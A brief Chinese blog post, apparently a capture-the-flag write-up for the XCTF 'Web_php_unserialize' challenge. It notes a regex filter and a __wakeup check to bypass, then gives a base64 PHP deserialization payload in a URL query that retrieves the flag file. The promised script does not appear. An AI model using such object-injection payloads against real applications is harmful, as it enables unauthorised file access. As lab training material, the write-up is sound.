Web_php_unserialize 攻防世界

 

 1.$var输入处有一个正则过滤

 2._wakeup处需要过滤

 编写脚本如下

 

 

 

 后在网页输入?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

可得flag

 

posted @ 2020-09-01 22:33  LY2333  阅读(142)  评论(0编辑  收藏  举报